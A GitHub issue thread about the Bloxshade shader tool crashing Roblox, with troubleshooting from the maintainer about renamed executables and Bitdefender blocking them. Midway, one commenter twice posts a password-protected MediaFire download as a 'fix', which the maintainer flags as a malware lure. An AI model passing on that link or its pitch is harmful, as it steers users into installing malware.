### ISSUE TITLE
Bloxshade breaking roblox

### ISSUE THREAD

**Issue by apersonwhomakesstuff** [Extravi/Bloxshade#41]
Ive been using bloxshade for about 4 months and now ive just got a problem, Roblox just crashes and doesnt work when i install it, Ive tried patching nvidia app, Making shortcuts, I cant even find any videos about it, So could you help me? 
![image](https://github.com/user-attachments/assets/3dea829a-33f4-4000-832c-4eb49104a60e)

**Comment by apersonwhomakesstuff** [comment]
Could you please help me?

**Comment by Extravi** [comment]
install the Nvidia app and reinstall Roblox and bloxshade

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Extravi** [comment]
i removed his comment don't listen to him hes trying to get you to install malware

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Extravi** [comment]
dont listen to this person they are trying to get you to install malware

**Comment by apersonwhomakesstuff** [comment]
i have nvidia app, rtx 3060 ti, bloxstrap, and it seems when the RobloxBetaPlayer.exe is renamed it breaks 
![image](https://github.com/user-attachments/assets/64c55491-1092-4b41-a1e7-35b413b87cc1)
got any fixes?

**Comment by Extravi** [comment]
there should be a 1.3mb roblox player and the real roblox should be renamed to eurotrucks2.exe

**Comment by Extravi** [comment]
you should see both RobloxPlayerBeta.exe in the folder and eurotrucks2.exe do not manually edit the files after installing bloxshade

**Comment by apersonwhomakesstuff** [comment]
alright thx ill try to do it again and launch it from the files this time

**Comment by stevefromminecraft123456** [comment]
so i reinstalled roblox, i reinstalled bloxstrap, reinstalled bloxshade, and reinstalled nvidia app and it still didnt work from web or files

**Comment by apersonwhomakesstuff** [comment]
so i reinstalled roblox, i reinstalled bloxstrap, reinstalled bloxshade, and reinstalled nvidia app and it still didnt work from web or files

**Comment by stevefromminecraft123456** [comment]
whoops, added 2 comments

**Comment by apersonwhomakesstuff** [comment]
sorry for bothering you ill stop

**Comment by Extravi** [comment]
it's likely just your anti virus blocking it what anti virus do you use

**Comment by SirBlueAxolotl** [comment]
i have the same problem and i use bitdefender

**Comment by apersonwhomakesstuff** [comment]
i also use bit defender

**Comment by apersonwhomakesstuff** [comment]
ill try adding it to my exceptions list

**Comment by apersonwhomakesstuff** [comment]
but i dont know what to add to it :cry:

**Comment by apersonwhomakesstuff** [comment]
i dont wanna use anselforroblox cause 9 antiviruses detect it (i think)

**Comment by Extravi** [comment]
Bitdefender is known to block Roblox if it's renamed to eurotrucks2

**Comment by apersonwhomakesstuff** [comment]
how do i fix it?

**Comment by apersonwhomakesstuff** [comment]
I DID IT

**Comment by apersonwhomakesstuff** [comment]
sorry for bothering you so much

**Comment by Extravi** [comment]
alright

**Comment by Freddyopop** [comment]
> I DID IT

How did you fix ?

**Comment by apersonwhomakesstuff** [comment]
adding a dont block for the bloxstrap client
